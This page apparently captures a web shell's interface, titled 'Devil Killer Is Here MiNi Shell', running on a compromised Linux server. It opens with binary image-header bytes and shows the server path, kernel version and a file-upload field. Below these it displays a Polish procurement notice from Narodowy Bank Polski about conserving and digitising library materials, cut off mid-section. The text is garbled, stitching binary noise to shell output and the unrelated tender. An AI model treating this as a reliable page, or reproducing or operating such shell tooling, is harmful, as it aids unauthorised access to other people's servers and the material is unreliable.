JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240603/0034892401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Konserwacja wraz z digitalizacją i fumigacją cennych materiałów bibliotecznych (dóbr kultury NBP) ze zbiorów Centralnej Biblioteki NBP </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NARODOWY BANK POLSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000002223</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Świętokrzyska 11/21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-919</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">DKRZ-WPI1@nbp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nbp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Polityka pieniężna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Konserwacja wraz z digitalizacją i fumigacją cennych materiałów bibliotecznych (dóbr kultury NBP) ze zbiorów Centralnej Biblioteki NBP </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-507e36e9-2194-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00348924</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zamowienia.nbp.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-zamowienia.nbp.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, a w szczególności: 1) składanie ofert, w tym ofert dodatkowych, 2) zaproszenie do negocjacji, 3) wymiana<br/>informacji, 4) przekazywanie dokumentów lub oświadczeń pomiędzy Wykonawcą a Zamawiającym, - odbywa się przy użyciu<br/>środków komunikacji elektronicznej, w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, na<br/>Platformie Zakupowej NBP pod adresem: https://e-zamowienia.nbp.pl.<br/>2. Wykonawca na Platformie Zakupowej NBP bez zalogowania może zapoznać się z dokumentacją postępowania oraz zadać<br/>pytanie do Zamawiającego.<br/>3. Zalecane formaty plików: .pdf, .doc, .xlsx, . W przypadku niemożności dołączenia plików w innych formatach zaleca się<br/>skompresowanie plików do paczki .zip oraz dołączenie ich do systemu.<br/>4. Informacje stanowiące tajemnicę przedsiębiorstwa wykonawca przekazuje w pliku wydzielonym i oznaczonym na Platformie jako<br/>„niejawny”.<br/>5. W przypadku problemów z obsługą konta w szczególności: z założeniem konta, zalogowaniem się na konto, złożeniem<br/>ofert/wniosków, komunikacją z Zamawiającym za pośrednictwem konta - wszelkie pytania i prośby o wyjaśnienie należy kierować do<br/>operatora platformy MarketPlanet za pomocą następujących kanałów komunikacji (od poniedziałku do piątku w godzinach od 9:00 do<br/>17:00):<br/>- Telefonicznie pod numerem: +48 22 25 72 223<br/>- Czat pod adresem: https://oneplace.marketplanet.pl<br/>- E-mail: oneplace@marketplanet.pl.<br/>6. Wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie oraz pozostałe szczegółowe informacje w ww. zakresie w<br/>Załączniku Nr 1 do Specyfikacji Warunków Zamówienia (dalej SWZ) i Załącznik Nr 2 do SWZ.<br/>7. Warunkiem przystąpienia do postępowania i złożenia oferty jest posiadanie konta na platformie MarketPlanet; Warunkiem<br/>założenia konta jest przesłanie wniosku do operatora platformy MarketPlanet poprzez stronę https://oneplace.marketplanet.pl Proces<br/>akceptacji wniosku z poprawnie wprowadzonymi danymi trwa do 24 godzin w dni robocze.<br/>8. Złożenie oferty w postępowaniu możliwe jest tylko przez wskazaną Platformę Zakupową NBP.<br/>9. Platforma dopuszcza załączanie plików o wielkości do 95 MB.<br/>10. Oznaczenie czasu odbioru danych przez Platformę: data oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.<br/>11. W postępowaniu: Ofertę, Ofertę dodatkową (jeżeli Zamawiający będzie<br/>prowadził negocjacje) oraz Oświadczenie z art. 125 ust. 1 ustawy Prawo zamówień publicznych (dalej &#34;ustawa&#34;), składane są pod<br/>rygorem nieważności:<br/>a) w formie elektronicznej,<br/>b) w postaci elektronicznej opatrzonej podpisem zaufanym,<br/>c) w postaci elektronicznej opatrzonej podpisem osobistym.<br/>12. W przypadku podpisania pliku podpisem zewnętrznym, konieczne jest wysłanie pary plików: pliku podpisanego i pliku<br/>zawierającego podpis.<br/>13. Pierwsza czynność opatrzenia Oferty kwalifikowanym podpisem lub podpisem osobistym może wymagać zainstalowania<br/>dedykowanego rozszerzenia do aplikacji Szafir oraz oprogramowania Java, oraz konieczności administracyjnego odblokowania<br/>systemu na komputerze przez administratorów informatycznych Wykonawcy. Aby podpisać ofertę podpisem zaufanym należy<br/>posiadać Profil zaufany, który umożliwi podpisywanie plików.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SEZ/DKRZ-WPI1-AK-241-0126/DEW/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 222290,24 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia w ramach Części I jest usługa konserwacji, fumigacji i digitalizacji dziewięciu cennych materiałów bibliotecznych stanowiących dobra kultury NBP, w tym:<br/>1.1.	transport Obiektów* z Siedziby Zamawiającego we własnych opakowaniach;<br/>1.2.	przeprowadzenia fumigacji Obiektów i badań mikrobiologicznych;<br/>1.3.	wykonanie usług konserwatorskich Obiektów;<br/>1.4.	wykonanie dokumentacji Konserwacji Obiektów wraz z przeniesieniem autorskich praw majątkowych do powstałej dokumentacji Konserwacji Obiektów wraz z wyłącznym prawem zezwalania na wykonywanie zależnego prawa autorskiego do dokumentacji oraz prawa własności nośników, na których utrwalono dokumentację;<br/>1.5.	wykonanie digitalizacji Obiektów wraz z przeniesieniem autorskich praw majątkowych do plików cyfrowych oraz innych utworów powstałych w wyniku digitalizacji Obiektów wraz z wyłącznym prawem zezwalania na wykonywanie zależnego prawa autorskiego do Utworów oraz prawa własności nośników, na których utrwalono Utwory;<br/>1.6.	transport czystych mikrobiologicznie Obiektów w nowych opakowaniach bezkwasowych do Siedziby Zamawiającego.<br/>2.	Szczegółowy opis przedmiotu zamówienia dla Części I, przedstawiono w „Szczegółowym Opisie Przedmiotu Umowy”, stanowiącym Załącznik Nr 1 do Projektowanych Postanowień Umowy (dalej: PPU) (Załącznik Nr 6 do Specyfikacji Warunków Zamówienia (dalej SWZ) - PPU do Części I - Usługa konserwacji wraz z digitalizacją i fumigacją przedwojennych wydawnictw Banku Polskiego, cennych materiałów bibliotecznych (dóbr kultury NBP).<br/><br/>*Definicja wyrazów użytych w SWZ znajduje się w PPU dla Części I, stanowiących Załącznik Nr 6 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 197900,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72252000-6 - Usługi komputerowe w zakresie archiwizowania</p> <p class="mb-0">79552000-8 - Usługi przetwarzania tekstu</p> <p class="mb-0">79999100-4 - Usługi skanowania</p> <p class="mb-0">90924000-0 - Usługi usuwania grzybów</p> <p class="mb-0">92312000-1 - Usługi artystyczne</p> <p class="mb-0">92522100-7 - Usługi ochrony obiektów historycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia w ramach Części II jest usługa digitalizacji dwudziestu jeden zszytych i oprawionych publikacji – materiałów bibliotecznych, wydanych od 1834 r. do 1880 r. stanowiących dobra kultury NBP, w tym:<br/>1.1.	przygotowanie Obiektów* do Digitalizacji poprzez oczyszczenie i odkurzenie;<br/>1.2.	zeskanowanie Obiektów do plików macierzystych TIFF oraz przetworzenia plików TIFF na pliki w formacie PDF przeznaczone do archiwizacji i publikacji;<br/>1.3.	samokontrola merytoryczna i jakościowa;<br/>1.4.	wykonanie ewentualnych poprawek i uzupełnień;<br/>1.5.	sporządzanie cyklicznych sprawozdań z Digitalizacji i postępu prac;<br/>1.6.	przetworzenie wykonanych plików TIFF na pliki prezentacyjne w formacie PDF przeznaczone do archiwizacji i udostępnienia obejmujące m.in.:<br/>1.6.1.	modyfikowania graficznego podnoszącego czytelność i estetykę utrwalonego obrazu (kadrowanie, korekcja gamma, kontrast etc.),<br/>1.6.2.	uzupełnienia każdego skanu o warstwę OCR, wraz z dokonaniem korekty tekstu po przeprowadzeniu OCR; <br/>1.7.	wykonanie publikacji w formatach PDF/A oraz PDF wyposażonych w warstwę tekstową oraz narzędzia nawigacyjne;<br/>1.8.	wykonanie kompletu metadanych deskryptywnych;<br/>1.9.	wykonanie dla każdego zdigitalizowanego Obiektu pliku metryczki oraz spisu treści;<br/>1.10.	wykonanie dokumentacji Digitalizacji dla każdego z Obiektów;<br/>1.11.	przekazanie na przenośnych dyskach HDD gotowych plików TIFF i PDF po weryfikacji;<br/>1.12.	transport Obiektów od Zamawiającego oraz zapakowanie i powrotny transport Obiektów do Zamawiającego;<br/>1.13.	przeniesienie całości autorskich praw majątkowych do powstałych w ramach Digitalizacji utworów, w tym do dokumentacji Digitalizacji Obiektów, produktów Digitalizacji, metadanych wraz z wyłącznym prawem zezwalania na wykonywanie zależnego prawa autorskiego do Utworów oraz prawa własności nośników na których utrwalono Utwory;<br/>1.14.	udzielenie gwarancji jakości i rękojmi za wady wykonanej Digitalizacji.<br/>2.	Szczegółowy opis przedmiotu zamówienia dla Części II, przedstawiono w „Szczegółowych Wymaganiach dostyczących Digitalizacji”, stanowiących Załącznik Nr 2 do Projektowanych Postanowień Umowy (dalej PPU) (Załącznik Nr 6 do SWZ - PPU do Części II - Usługa digitalizacji wybranych wydawnictw Banku Polskiego, cennych materiałów bibliotecznych (dóbr kultury NBP)).<br/><br/>*Definicja wyrazów użytych w SWZ znajduje się w PPU dla Części II, stanowiących Załącznik Nr 6 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 24390,24 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72252000-6 - Usługi komputerowe w zakresie archiwizowania</p> <p class="mb-0">79552000-8 - Usługi przetwarzania tekstu</p> <p class="mb-0">79999100-4 - Usługi skanowania</p> <p class="mb-0">90924000-0 - Usługi usuwania grzybów</p> <p class="mb-0">92312000-1 - Usługi artystyczne</p> <p class="mb-0">92522100-7 - Usługi ochrony obiektów historycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania Przedmiotu Umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia w Części I mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej, tj.: <br/>1.1.	Wykonawca jest zobowiązany wykazać, że wykonał należycie w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 2 (dwa) zamówienia (umowy) obejmujące wykonanie usług konserwacji, fumigacji i digitalizacji materiałów bibliotecznych.<br/>1.2.	Wykonawca jest zobowiązany wykazać, że dysponuje lub realizując zamówienie będzie dysponował co najmniej 2 osobami, które zostaną skierowane przez Wykonawcę do realizacji zamówienia, z których każda posługuje się w mowie i w piśmie językiem polskim, w tym:<br/>1.2.1.	co najmniej 1 z osób musi posiadać:<br/>1.2.1.1.	kwalifikacje zawodowe w wykonywaniu usług konserwacji materiałów bibliotecznych, potwierdzone dyplomem ukończenia studiów wyższych na kierunku konserwacji i restauracji dzieł sztuki w specjalności: konserwacja papieru i skóry zabytkowej;<br/>1.2.1.2.	doświadczenie zawodowe rozumiane jako posiadanie minimum 4-letniego stażu pracy w zawodzie konserwatora oraz uczestniczenie w co najmniej 2 (dwóch) przedsięwzięciach obejmujących konserwację papieru albo konserwacje obiektów na podłożu papierowym albo konserwację obiektów odpowiadające swoim rodzajem przedmiotowi zamówienia.<br/>1.2.2.	co najmniej 1 z osób musi posiadać doświadczenie zawodowe rozumiane jako uczestniczenie w co najmniej 2 (dwóch) przedsięwzięciach obejmujących wykonanie usług fumigacji albo digitalizacji zbiorów bibliotecznych wydanych przed 1939 r.<br/><br/>2.	O udzielenie zamówienia w Części II mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej, tj.: <br/>2.1.	Wykonawca jest zobowiązany wykazać, że wykonał należycie w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 2 zamówienia (umowy) obejmujące wykonanie usług digitalizacji z oryginałów oprawnych materiałów wydanych przed 1939 r. do plików TIFF i konwersji do formatu prezentacyjnego PDF.<br/>2.2.	Wykonawca jest zobowiązany wykazać, że dysponuje lub realizując zamówienie będzie dysponował co najmniej 2 osobami, które zostaną skierowane przez Wykonawcę do realizacji zamówienia, w szczególności będą świadczyć usługi digitalizacji materiałów bibliotecznych, z których każda posługuje się w mowie i w piśmie językiem polskim oraz posiada doświadczenie zawodowe rozumiane jako uczestniczenie w co najmniej 2 (dwóch) przedsięwzięciach obejmujących skanowanie materiałów wydanych przed 1939 r. <br/>2.3.	Wykonawca jest zobowiązany wykazać, że dysponuje lub realizując zamówienie będzie dysponował 1 urządzeniem tj. skanerem umożliwiającym:<br/>•	bezdotykowe skanowanie obiektów o różnych formatach;<br/>•	wyposażone w półki szalkowe dopasowujące się do skanowanego obiektu;<br/>•	w bezpiecznym oświetleniu pozbawionym promieniowania cieplnego, bez promieniowania UV i IR; <br/>•	zapewniające jednolite oświetlenie skanowanych obiektów, w tym również krawędzi;<br/>•	naświetlanie z indywidualnie dobranym minimalnym czasem, światło skanera aktywowane tylko na czas skanowania;<br/>•	tryb skanowania zapewniający uzyskiwania kopii cyfrowych; <br/>•	wyposażenie w stół szalkowy o regulowanym stopniu rozwarcia lub kołyskę do bezpiecznego skanowania zbiorów oprawnych, zapewniający skanowanie z szybą o kontrolowanym docisku bez błysków lub bez niej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dla Części I i II:<br/>1. Wykaz dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie<br/>ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały<br/>wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a<br/>jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być 